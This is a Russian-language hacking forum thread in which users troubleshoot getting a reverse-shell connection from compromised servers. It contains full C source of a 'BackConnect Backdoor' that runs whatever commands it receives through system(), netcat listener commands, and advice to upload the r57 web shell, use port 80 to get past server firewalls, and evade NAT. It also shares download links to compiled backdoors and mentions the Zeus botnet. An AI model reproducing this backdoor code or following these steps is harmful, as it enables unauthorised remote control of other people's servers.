у меня не получается использовать backconnect backdoor:

беру сервер на котором с которым удаётся установить соединение через бэкдор - всё работает

отключаю у себя windows firewall, антивирус

запускаю: nc -l -p 13001

на сервере запускаю:
gcc bd.c -o bd
./bd my_ip 13001

свой ip узнаю на сайте cmyip.com, либо из коммандной строки: ipconfig

ниже код backconnect backdoor

/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
* client: nc -lp 9999
* server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
struct sockaddr_in sock;
int sd;
char command[256];

if (argc < 3) {
printf("%s <host> <port>\n", argv[0]);
return 1;
}

close(1);

if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror(argv[0]);
return 1;
}

bzero(&sock, sizeof(sock));

sock.sin_family = AF_INET;
sock.sin_port = htons(atoi(argv[2]));
inet_aton(argv[1], &sock.sin_addr);

if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
perror(argv[0]);
return 1;
}

close(2);
dup(sd);

bzero(command, 256);
while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
system(command);
bzero(command, 256);
}

close(sd);
return 0;
}

... и соединения не происходит. В чём может быть проблема?

интернет через corbina, backconnect пробовал произвести на нескольких серверах - нигде не получилось.
Пробовал в одном окне: nc -l -p 1234, а в другом окне: nc my_ip 1234 - всё нормально работает.

Держи другой бэкконект.
http://rapidshare.com/files/223658318/back.html
Скомпилированный.
Не когда не подводил, всегда проканывал.
use:./back your_ip
nc:nc -l -p 4000
Возможно соеденение не идёт из-за фаера на серваке.
Режет запросы.
Если что сорцы.
http://rapidshare.com/files/223659648/back.c.html

не получилось. результат тот-же
Возможно соеденение не идёт из-за фаера на серваке.
как можно это обойти и совершить коннект?

1. Залей шелл r57. Потом открой NetCat и запусти с параметром -l -n -v -p 11457
Потом в самом низу шелла r57 есть менюшка бэкконект. В поле порт вбей 11457, а в поле IP свое IP. Нажми connect.

2. Если не получается, т.е. блочит фаер. В полне возможно, что он просто блочит порты все кроме 80. Т.е. открой у себя 80 порт и пробуй на него ;)

1)
D:\nc>nc -l -n -v -p 80
listening on [any] 80 ...

2)
шелл r57 -> ::Сеть:: -> back connect:
IP: мой
порт: 80

не получилось.

пробую на этом сервере: <вырезано>

Подскажите, какие ещё варианты?

krobol, через r57 попробуй на другой порт. На тот, что я привел в примере. Попробуй сам открыть порт через этот шелл. Если получиться открыть порт, то на него делай бэкконект. А чтобы делать на 80, то надо его у себя открыть сначало ;)


ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0

ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0

авторизация: логин: 1, пароль: 1 - я указал в скобках

открывать порт через шелл и коннектится к нему у меня получается (если не здесь, то на других серверах точно получалось). А вот backconnect нигде не получается

Как открыть у себя 80 порт? Если: nc -l -n -v -p 80, то так я делал.

на своём компе набрал
> ipconfig
ответ:

corbina - PPP адаптер:

DNS-суффикс этого подключения . . :
IP-адрес . . . . . . . . . . . . : 93.80.84.170
Маска подсети . . . . . . . . . . : 255.255.255.255
Основной шлюз . . . . . . . . . . : 93.80.84.170

отключил firewall, антивирус и набрал:
> nc -l -p 33333

затем, зашёл в unix-shell (/bin/bash) на сервер. Там оказался netcat, я набрал:
$ nc 93.80.84.170 33333

и ничего не проходит. Почему?

$ ping 93.80.84.170 работает

помогите, пожалуйста, разобраться

Чего-то ты тупишь =\
Я все сделал и никаких проблем нету =\
Сейчас видео сниму.


add:
Вот тут можешь скачать видео: http://webfile.ru/3431653

сделал на том сервере, который я указал??

Я обновил свой последний пост.
Я сделал там, где ты шелл дал =\

http://webfile.ru не грузится

можешь скинуть на другой обменник?

Я с тебя в шоке...
То ты спрашиваю, где я сделал, то блин файлообменники у него не грузятся... =\
На: http://rapidshare.com/files/223996083/netcat.rar.html

всё сделал как в видео, но у меня в netcat ничего не выдаёт, никаких ответов сервера !?!?!? почему??

после нажатия "выполнить" в шелле - в netcat ничего не происходит

Может у тебя неткат кривой?
Значит скачай мой: http://rapidshare.com/files/224003205/nc.rar.html
Потом запускай не через cmd, а исходник из папки запусти. Потом вбей в нем -l -n -v -p 3373
Потом в шелле тоже на порт 3373. Если же нет, то тогда хз что =(

сделал как ты написал:

скачал твой netcat
запустил из папки
вбил -l -n -v -p 3373
в шелле тоже этот порт 3373

не получается :(

пробовал с дедика, тоже не идёт, но с дедика в шелле пишет фразу: now script try connect to xxx.xxx.xxx.xxx port 3373 ...
на мой комп даже этого не писало.

у меня инет по сетевому проводу через корбину - может в этом дело? как это можно обойти?

на дедике возможно дело в антивирусе (я не знаю как его отключать)

у меня есть root доступ на сервер с Linux

как можно сделать на него backconnect с веб-шелла?

nc присутствует, но как в windows
$ nc -l
не работает.
Как на unix запускается nc? или какая другая программа на прослушку порта для backconnct?
________________________
всё получилось!

отдельное спасибо Tigger!


на удалённом unix сервере nc какой-то кривой стоит.

взял архив http://www.sfr-fresh.com/unix/misc/nc110.tgz
и собрал (make linux).

Со сборкой тоже пришлось помучиться. Выдавало ошибку в netcat.c - функция res_init() не определена.
Решил удалением части кода из netcat.c:

#ifdef HAVE_BIND
/* can *you* say "cc -yaddayadda netcat.c -lresolv -l44bsd" on SunLOSs? */
res_init();
#endif


Всё заработало как в видео Tigger.


Если кто-то знает как обойти "сидение под натом" расскажите, пожалуйста.

Чего-то ты тупишь =\
Я все сделал и никаких проблем нету =\
Сейчас видео сниму.


add:
Вот тут можешь скачать видео: http://webfile.ru/3431653
Видео удалили. Можешь перезалить?

Уважаемые Гуру!
сорри что снова поднял эту тему!
меня интересует так же тема backconnecta

подскажите как можно организовать BC за натом ! сервер чтобы linux был

организовывал bc на зевсе там сервак на win что очень не приемлемо! да глючит вся эта связка вместе!

что можете предложить какие нить shell или еще что либо! - это для сервера
а клиент который за NAT - ??? так же может исходники есть чтобы был прозрачен для firewall черз 80 порт

или возможно переделать сервер зевса на linux? кто с этим сталкивался

*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006

Елки =) моя хрень. старая-старая.
PS сор оффтоп